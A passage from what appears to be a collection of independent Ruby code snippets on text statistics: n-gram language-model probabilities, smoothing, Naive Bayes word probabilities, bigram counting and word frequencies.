=> 2013939,\n'WS' => 1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def calc_probability(actual_word, translation_word)\n d = levenshtein_distance(actual_word, translation_word)\n\n min_leng= actual_word.size < translation_word.size ? actual_word.size : translation_word.size\n p = 1.0 - d * 1.0 / min_leng\n p < 0 ? 0.0 : p\n end",
"def calculate_kn_probability next_ngram: nil, ngram_model: 0, discount: 0.25, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n \n return calculate_mle_probability(next_ngram: next_ngram, separator: separator) if local_ngram_model==1 # Recursion stops at the unigram model\n\n prefix_regex = /^#{next_ngram.split(separator)[0..-2].join(separator)}\\b/\n prefix = next_ngram.split(separator)[0..-2].join(separator)\n suffix = next_ngram.split(separator).last\n similar_ngrams = ngram_counts[local_ngram_model].select{|ngram, _| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown}\" if (@verbose and ngram.match(prefix_regex)); ngram.match(prefix_regex)}.count # Number of words which complete the current n-1 gram, e.g. for the n-gram \"your house looks nice\" we count \"yhl ugly\", \"yhl fine\" etc. Notice - we don't counts the number of occurences for \"yhl ugly\" etc but only the number of lower-order ngrams which complete the current ngram.\n puts \"#{'Total of '.red + similar_ngrams.to_s.red + ' found.'.red} Now calculating counts.\" if @verbose\n similar_ngrams_total_counts = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown} with raw count of #{counts}\" if (@verbose and ngram.match?(prefix_regex)); if ngram.match(prefix_regex) then acc += counts; else acc; end} # It's here that we actually sum up the counts\n puts \"#{'Total count is '.red + similar_ngrams_total_counts.to_s.red}\"\n ngrams_with_fixed_suffix = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{ngram.brown} / #{suffix.green} with raw count of #{counts}\" if (@verbose and ngram.match?(/^#{suffix}\\b/)); acc += counts if ngram.match?(/^#{suffix}\\b/); acc}\n\n first_term = [get_raw_counts(next_ngram).to_f - discount, 0].max / similar_ngrams_total_counts.to_f\n second_term = discount * (similar_ngrams.to_f/ngrams_with_fixed_suffix.to_f)\n \n return first_term + (second_term * calculate_kn_probability(next_ngram: next_ngram.split(separator)[1..-1].join(separator)))\n end",
"def p(trigram)\n\n bigram = trigram[1..2]\n unigram = trigram[2..2]\n # see which case we fall into for this backoff scheme\n if @counts.include?(trigram)\n # p1 function, trigram exists\n return pML(trigram, @discount)\n else\n ngram = nil\n beta_gram = nil\n alpha = 0\n if @counts.include?(bigram)\n # p2 function, no trigram but bigram exists\n ngram = bigram\n beta_gram = trigram[0..1] # the words used to help generate a beta-set of zero-count trigram\n # alpha mass redistribution\n alpha = @weights[:p2] * (1 - pML(trigram, @discount))\n else\n # p3 function, no trigram or bigram\n ngram = unigram\n beta_gram = trigram[0..0] # the words used to help generate a beta-set of zero-count bigrams\n # alpha mass redistribution\n alpha = @weights[:p3] * (1 - pML(trigram, @discount))\n end\n\n numerator = pML(ngram) \n denominator = @beta_gram_cache.fetch(beta_gram, nil) \n if not denominator\n dgram = nil\n sum = 0\n @vocab.each do |v| # all permutations of vocab words\n dgram = beta_gram + [v]\n # that are zero-count ngrams of (w,w_i-1,w_i-2) or (w,w_i-1)\n if not @counts.include?(dgram)\n # should be part of the sum of pML(w|w_i-1) or pML(w)\n sum += pML(dgram.drop(1)) # drop w_i-2 or w_i-1 as needed\n end\n end\n\n @beta_gram_cache.store(beta_gram, sum)\n denominator = sum\n end\n\n if denominator == 0 then return 0 end\n return alpha * numerator / denominator\n end\n\n end",
"def word_tag_probability(word, tag)\n denom = @tag_frequencies[tag]\n\n if denom.zero?\n 0\n else\n @word_tag_combos[\"#{word}/#{tag}\"] / denom.to_f\n end\n end",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def word_probability(word, category)\n total_words_in_category = total_word_count_in_category(category)\n return 0.0 if total_words_in_category == 0\n word_count(word, category).to_f / total_words_in_category\n end",
"def doc_probability(category)\n doc_prob = 1.0\n self.words.each do |word|\n doc_prob *= BayesCategory.where(:category=>category).first.word_probability(word[0])\n end\n doc_prob\n end",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= q(tokens[i-2..i])\n end\n probability\n end",
"def probability_of_ngrams(ngrams)\n probabilities = probabilities_for(ngrams).values\n \n return (probabilities.inject { |joint,prob| joint * prob } || 0.0)\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def score(other_counts)\n\t\tscore = 0.0\n\t\tseen = 0\n\t\tother_counts.each { |k, v|\n\t\t\tcount = @trigram_counts[k]\n\t\t\tscore += v * Math.log(@probs[@trigram_counts[k]])\n\t\t}\n\t\tscore\n\tend",
"def frequency_of(gram)\n @frequencies.fetch(gram,0)\n end",
"def probability_token_in_label(label, token)\n (@data[label][token] || 0).to_f / @doc_counts[label].to_f\n end",
"def weighted_probability(word)\n word = (Word === word ? word : get(word))\n\n p = BigDecimal.new(1)\n p = p * probability(word)\n p = p * file_probability(word, 1)\n #p = p * lexicon_weight(word)\n #p = p * weight_length(word)\n #p = p * weight_stem(word)\n #p = p * weight_plural(word)\n p\n end",
"def most_probable_next_word(string)\n words = string.split(\" \")\n bigram_key = words.last\n trigram_key = words.last(2).join(\" \") if words.count >= 2\n most_probable_word = \"\"\n\n ## if we can find trigram and trigram exists\n if words.count >= 2 and @trigrams[trigram_key] != nil\n # get w3 from grams with highest P(w1,w2,w3) = P(w1)*P(w2|w1)*P(w3|w1,w2)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(trigram_key + \" \" + word)\n # if P(w1)*P(w2|w1)*P(w3|w1,w2) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n\n puts \"ERROR IN TRIGRAMS\" if highest_probability == 0.0\n puts \"Trigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 3).round(4).to_s\n return most_probable_word\n ## if we can find a bigram and bigram exists\n elsif words.count >= 1 and @bigrams[bigram_key] != nil\n # get w2 from grams with highest P(w2|w1)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(bigram_key + \" \" + word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"ERROR IN BIGRAMS\" if highest_probability == 0.0\n puts \"Bigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 2).round(4).to_s\n return most_probable_word\n ## return random unigram?\n else\n highest_probability = 0.0\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"Unigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 1).round(4).to_s\n return most_probable_word\n end\n end",
"def get_token_probability(token, category_index)\n denom = @total_token_counts[category_index] + @token_counts[category_index].size * @prior_token_count \n if denom == 0\n return 0\n else\n return ((@token_counts[category_index][token] || 0) + @prior_token_count).to_f / denom\n end\n end",
"def wordprob(word, category)\n numerator = self.word_count_in_category(word, category) + 1\n denominator = self.all_word_count_in_category(category) + self.vocabularies.size\n return numerator / denominator\n end",
"def file_probability(word, threshold=0)\n word = (Word === word ? word : get(word))\n n = 1 # at least one\n word.files.each do |f, c|\n n += 1 if c > threshold\n end\n BigDecimal.new(n) / corpus_files.size\n end",
"def frequency(char)\n return 0 if (@size.nil? || @size <= 0)\n @map[char.upcase] * 100/@size\n end",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def pangram?\n return @hist.size == 26\n end",
"def probabilities\n Hash[ BayesCategory.all.to_a.collect { |word|\n [word.category, probability(word.category)]\n }]\n end",
"def prob_word_dist(arr)\n\tcounts = {}\n\t(0..arr[0].size-1).each do |i|\n\t\tcounts[i] = {}\n\tend\n\tarr.each do |word|\n\t\t(0..word.size-1).each do |i|\n\t\t\tif counts[i].has_key?(word[i]) then\n\t\t\t\tcounts[i][word[i]] += 1\n\t\t\telse\n\t\t\t\tcounts[i][word[i]] = 1\n\t\t\tend\n\t\tend\n\tend\n\tresult = []\n\t(0..arr.size-1).each do |i|\n\t\tcurr_word = \"\"\n\t\t(0..arr[0].size-1).each do |j|\n\t\t\ttemp_arr = []\n\t\t\tcounts[j].keys.each do |char|\n\t\t\t\t(1..counts[i][char]) do\n\t\t\t\t\ttemp_arr.push(char)\n\t\t\t\tend\n\t\t\tend\n\t\t\tcurr_word += temp_arr[random * temp_arr.size]\n\t\tend\n\t\tresult.add[curr_word]\n\tend",
"def dictionary\n @dictionary ||= ngrams.first.probabilities \n end",
"def qML(ngram)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n # get a bigram\n dgram = ngram[0..1]\n when 2\n # get a unigram\n dgram= ngram[0..0]\n end\n\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n return @counts.fetch(ngram, 0).to_f / @counts.fetch(dgram, 0).to_f\n else\n # if the denominator count would be zero, return 0\n if @word_count == 0 then return 0 end\n return @counts.fetch(ngram, 0).to_f / @word_count.to_f\n end\n\n rescue ZeroDivisionError\n 0\n end",
"def calculate_gt_probability next_ngram: nil, ngram_model: 0, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n next_ngram_rawcount = ngram_counts[local_ngram_model][next_ngram].to_i\n\n if next_ngram_rawcount == 0 # Distributing P*(unseen)\n return good_turing_bins[local_ngram_model][1].to_f/good_turing_bins[local_ngram_model][0] if @oov_counts.nil? # if no oov are set, we assign the whole probability mass to every missing token\n return (@leftover_probability[local_ngram_model]/@oov_counts[local_ngram_model].values.sum)*@oov_counts[local_ngram_model][next_ngram] # otherwise we assign only part of it\n else\n revised_counts = get_revised_counts next_ngram: next_ngram, ngram_model: local_ngram_model\n return revised_counts.to_f/good_turing_bins[local_ngram_model][0]\n end\n end",
"def sentence_commonality(sentence)\n probability_of_ngrams(common_ngrams_from_sentence(sentence))\n end",
"def most_frequent_bigram(str)\n bigram_count = Hash.new(0)\n\n # count each bigram appearance\n (0...str.length - 1).each do |i|\n bigram = str[i] + str[i+1]\n bigram_count[bigram] += 1\n end\n\n # return most frequent bigram\n bigram_count.max_by { |k, v| v }.first\nend",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def most_frequent_bigram(str)\n most_freq = \"\"\n highest_freq = 0\n bigram_hash = Hash.new(0)\n len = str.length\n (0...len-1).each { |idx| bigram_hash[str[idx..idx+1]] += 1 }\n bigram_hash.each do |k, v| \n if v > highest_freq\n most_freq = k \n highest_freq = v\n end\n end\n most_freq\nend",
"def word_prob(category, word)\n cat_freq = word_freq(category, word)\n non_cat_freq = word_freq(counter.keys, word) - cat_freq\n cat_docs = doc_size(category)\n non_cat_docs = doc_size(doc_counter.keys) - cat_docs\n\n cat_prob = [1.0 * cat_freq / cat_docs, 1.0].min\n non_cat_prob = [1.0 * non_cat_freq / non_cat_docs, 1.0].min\n\n if cat_prob == 0.0\n cond_prob = 0.4\n else\n cond_prob = 1.0 * cat_prob / (cat_prob + non_cat_prob)\n end\n\n # STDOUT.puts \"#{category}-#{word}, cat #{cat_prob}, non_cat #{non_cat_prob}, cond_p #{cond_prob}\"\n\n cond_prob = [[cond_prob, 0.99].min, 0.01].max\n end",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def text_commonality(text)\n probability_of_ngrams(common_ngrams_from_text(text))\n end",
"def most_frequent_bigram(str)\n count = Hash.new(0)\n\n (0...str.length - 1).each do |i|\n bigram = str[i..i + 1]\n\n count[bigram] += 1\n end\n\n count.sort_by { |k, v| v } [-1][0]\nend",
"def pML(ngram, discount=0)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n dgram = ngram[0..1]\n when 2\n dgram= ngram[0..0]\n end\n\n result = 0\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @counts.fetch(dgram, 0).to_f\n else\n if @word_count == 0 then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @word_count.to_f\n end\n\n# puts \"#{ngram.inspect} #{result}\"\n return result\n\n rescue ZeroDivisionError\n 0\n end",
"def word_prob(word, type)\n total_words_in_type = total_word_count_in_type(type)\n return total_words_in_type == 0 ? 0.0 : word_count(word, type).to_f / total_words_in_type\n end",
"def probability\n return @probability\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= p(tokens[i-2..i])\n end\n probability\n end",
"def most_frequent_bigram(str)\n counts = Hash.new(0)\n (0...str.length-1).each do |i|\n bigram = str[i..i + 1]\n counts[bigram] += 1\n end\n\n sorted = counts.sort_by { |h,v| v } # sorts by value \n sorted.last[0]\nend",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def word_frequency(text)\n norm_array = normalize(text).to_a\n freq = { }\n norm_array.each_with_object(Hash.new(0)){|key,hash| hash[key] += 1}\nend",
"def document_frequency\n @corpus.each_with_object({}) do |doc, df|\n doc.bag_of_words.keys.each do |word|\n df[word] = (df.fetch(word) { 0.0 }) + 1.0\n end\n end\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigram_hash[str[i..i+1]] += 1\n i += 1\n end\n\n bigram_hash.max_by {|k, v| v}[0]\nend",
"def calculate_match_probability\n # two heuristics: \n # 1 is are their multiple words in term_text? if so, mark as probable\n # if not, does it match the anchor regexp? if so, mark as probable\n # else, mark as improbable\n \n # multiple words?\n anchor_regexp = \"(featuring|plus|the|presents|with|plus|and|\\,|\\&|[()]|\\/|\\:|\\-|^|$)\"\n nix_regexp = \"parking|\\svs\\.?\\s\" \n if artist_name=~/#{nix_regexp}/i\n self.match_probability=\"unlikely\"\n return nil\n end\n text=term_text.strip\n if text[\" \"]\n self.match_probability=\"likely\"\n return \"multpl\"\n end\n if artist_name=~/#{anchor_regexp}\\s*#{text}\\s*#{anchor_regexp}/i\n self.match_probability=\"likely\"\n return \"regexp\"\n end\n# if artist_name=~/#{anchor_regexp}\\s+?#{text}\\s+?#{anchor_regexp}/i\n# match_probability=\"likely\"\n# return \"regexp\"\n# end\n self.match_probability=\"unlikely\"\n return nil\n end",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def probability_token_is_label(token, label, prob_label)\n token_count = token_count(token)\n prob_token = token_count / @doc_counts.values.reduce(:+).to_f\n return nil if prob_token == 0.0\n\n prob_token_in_label = probability_token_in_label(label, token)\n (prob_token_in_label * prob_label) / prob_token\n end",
"def probability var, val\n unless self.count.zero?\n self.count{|r| r[var] == val}.fdiv(self.count)\n else\n 0\n end\n end",
"def percent_of_word(word)\n @total_count = SubWordJoin.where(word: word).count\n puts @total_count\n sub_count = 0\n @sub = SubDriver.where(driver: self)\n @sub.each do |sub|\n sub_count += SubWordJoin.where(word: word, sub_driver: sub).count\n end\n\n percent = (sub_count.to_f/@total_count)*100\n return percent.round(2)\n\n end",
"def freq\n @freq ||= begin\n # calculate ngram counts for the haystack\n counts = Hash.new(0)\n veach(\"Haystack\", @haystack) do |element|\n element.ngrams.each do |ngram|\n counts[ngram] += 1\n end\n end\n\n # turn counts into inverse frequencies\n map = Hash.new(1)\n total = counts.values.inject(&:+).to_f\n counts.each do |ngram, count|\n map[ngram] = ((total / count) * 10).round\n end\n map\n end\n end",
"def word_freq(text)\n frequency = {}\n unique_words(text).each do |word|\n frequency[word] = 0\n end\n split_normalise(text).each do |word|\n frequency[word] += 1\n end\n frequency\nend",
"def calculate\n document_frequency.each_with_object({}) do |(word, freq), idf|\n idf[word] = Math.log(@corpus.size/freq)\n end\n end",
"def calculate_probability(useful_results, reroll_count)\n return 100.0 * useful_results / ( 6 ** reroll_count )\n end",
"def probability_of_class(classification)\n @number_of_documents_in_class[classification] / @number_of_documents.to_f\n end",
"def most_frequent_bigram(str)\n bigram = Hash.new(0)\n (0...str.length).each { |index| bigram[str[index..index+1]] += 1 }\n bigram.key(bigram.values.max)\nend",
"def contar(texto)\n palavras = texto.split\n\n frequencies = Hash.new(0)\n\n palavras.each do |word|\n frequencies [word] += 1\n end\n\n frequencies = frequencies.sort_by do |wor, count|\n end\n frequencies.reverse!\n\n frequencies.each do |wor, count|\n puts wor + \" \" + count.to_s\n end\nend",
